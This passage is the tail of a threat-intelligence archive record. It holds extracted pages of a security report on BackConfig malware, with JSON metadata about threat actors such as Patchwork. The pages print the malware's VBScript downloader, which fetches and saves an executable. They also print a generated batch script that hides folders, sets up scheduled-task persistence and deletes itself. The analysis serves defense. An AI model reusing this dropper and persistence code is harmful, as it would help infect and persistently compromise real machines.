CreateObject(\"WScript.Shell\")\r\n     strHomeFolder =\r\noShell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\r\n     strPath = \"\u003cstrong\u003eC:\\Drivers\\dphc.exe\"\u003c/strong\u003e\r\nOn Error Resume Next\r\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\n    objXMLHTTP.open \"GET\", strFileURL, false\r\n    objXMLHTTP.send()\r\nIf objXMLHTTP.Status = 200 Then\r\nSet objADOStream = CreateObject(\"ADODB.Stream\")\r\nobjADOStream.Open\r\nobjADOStream.Type = 1  \r\nobjADOStream.Write objXMLHTTP.ResponseBody\r\nobjADOStream.Position = 0    \r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 17 of 20\n\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nIf objFSO.Fileexists(strPath) Then WScript.Quit()\r\nSet objFSO = Nothing\r\nobjADOStream.SaveToFile strPath\r\nobjADOStream.Close\r\nSet objADOStream = Nothing\r\nEnd if\r\nSet objXMLHTTP = Nothing  \r\n“Setup” BAT component\r\n[Audio.txt -\u003e Audio.bat CODE]\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\nSet oFile = fso.CreateTextFile(\"c:\\Drivers\\Audio.txt\")\r\noFile.WriteLine (\"echo off\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\pdf\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\dwg\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Daily\\Backup\\Files\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Adobe\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Daily\")\r\noFile.WriteLine (\"attrib +a +h +s C:\\Drivers\")\r\noFile.WriteLine (\"del /f\r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"del /f\r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\"\r\noFile.WriteLine (\"SET /A %COMPUTERNAME%\")\r\noFile.WriteLine (\"SET /A RAND=%RANDOM% 10000 + 1\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% \u003e\u003e\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 18 of 20\n\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% \u003e\u003e\r\n\u003cstrong\u003e%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\")\u003c/strong\u003e\r\noFile.WriteLine (\"schtasks /delete /tn Winmgt_log /f\")\r\noFile.WriteLine (\"schtasks /delete /tn Yahoo_Drive /f\")\r\noFile.WriteLine (\"schtasks /create /sc minute /mo 10 /f /tn\r\nWinmgt_log /tr C:\\Drivers\\dphc.exe\")\r\noFile.WriteLine (\"schtasks /create /sc minute /mo 20 /f /tn\r\nYahoo_Drive /tr C:\\Drivers\\Drive.vbs\")\r\noFile.WriteLine (\"ren C:\\Drivers\\Drive.txt Drive.vbs \")\r\noFile.WriteLine (\"del %0\")\r\noFile.Close\r\nSet fso = Nothing\r\nSet oFile = Nothing\r\n    Dim OldName, NewName\r\n    GivenLocation = \"C:\\Drivers\\\"\r\n    OldName = \"Audio.txt\"\r\n    \u003cstrong\u003eNewName = \"Audio.bat\"\u003c/strong\u003e\r\n    On Error Resume Next\r\n    Name GivenLocation \u0026 OldName As GivenLocation \u0026 NewName\r\n    Dim RetVal\r\n    RetVal = Shell(\"C:\\Drivers\\Audio.bat\", vbHide)\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 19 of 20\n\nSource: https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nhttps://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA", "MITRE" ], "references": [ "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/" ], "report_names": [ "updated-backconfig-malware-targeting-government-and-military-organizations" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "ca292585-950c-400f-b632-c19fa3491fe1", "created_at": "2022-10-25T15:50:23.599765Z", "updated_at": "2026-04-10T02:00:05.417659Z", "deleted_at": null, "main_name": "MONSOON", "aliases": null, "source_name": "MITRE:MONSOON", "tools": [ "TINYTYPHON", "BADNEWS", "Unknown Logger", "AutoIt backdoor" ], "source_id": "MITRE", "reports": null }, { "id": "88854a9f-641a-4412-89db-449b4d5cbc51", "created_at": "2022-10-25T16:07:23.963599Z", "updated_at": "2026-04-10T02:00:04.810023Z", "deleted_at": null, "main_name": "Operation HangOver", "aliases": [ "G0042", "Monsoon", "Operation HangOver", "Viceroy Tiger" ], "source_name": "ETDA:Operation HangOver", "tools": [ "AutoIt backdoor", "BADNEWS", "BackConfig", "JakyllHyde", "TINYTYPHON", "Unknown Logger", "WSCSPL" ], "source_id": "ETDA", "reports": null }, { "id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4", "created_at": "2025-08-07T02:03:25.123407Z", "updated_at": "2026-04-10T02:00:03.668131Z", "deleted_at": null, "main_name": "ZINC EMERSON", "aliases": [ "Confucius ", "Dropping Elephant ", "EHDevel ", "Manul ", "Monsoon ", "Operation Hangover ", "Patchwork ", "TG-4410 ", "Viceroy Tiger " ], "source_name": "Secureworks:ZINC EMERSON", "tools": [ "Enlighten Infostealer", "Hanove", "Mac OS X KitM Spyware", "Proyecto2", "YTY Backdoor" ], "source_id": "Secureworks", "reports": null }, { "id": "c81067e0-9dcb-4e3f-abb0-80126519c5b6", "created_at": "2022-10-25T15:50:23.285448Z", "updated_at": "2026-04-10T02:00:05.282202Z", "deleted_at": null, "main_name": "Patchwork", "aliases": [ "Hangover Group", "Dropping Elephant", "Chinastrats", "Operation Hangover" ], "source_name": "MITRE:Patchwork", "tools": [ "NDiskMonitor", "QuasarRAT", "BackConfig", "TINYTYPHON", "AutoIt backdoor", "PowerSploit", "BADNEWS", "Unknown Logger" ], "source_id": "MITRE", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "cfdd350b-de30-4d29-bbee-28159f26c8c2", "created_at": "2023-01-06T13:46:38.433736Z", "updated_at": "2026-04-10T02:00:02.972971Z", "deleted_at": null, "main_name": "VICEROY TIGER", "aliases": [ "OPERATION HANGOVER", "Donot Team", "APT-C-35", "SectorE02", "Orange Kala" ], "source_name": "MISPGALAXY:VICEROY TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434278, "ts_updated_at": 1775791983, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d39ee9fb22106b3f9da17e504c910b97f200bbd5.pdf", "text": "https://archive.orkl.eu/d39ee9fb22106b3f9da17e504c910b97f200bbd5.txt", "img": "https://archive.orkl.eu/d39ee9fb22106b3f9da17e504c910b97f200bbd5.jpg" } }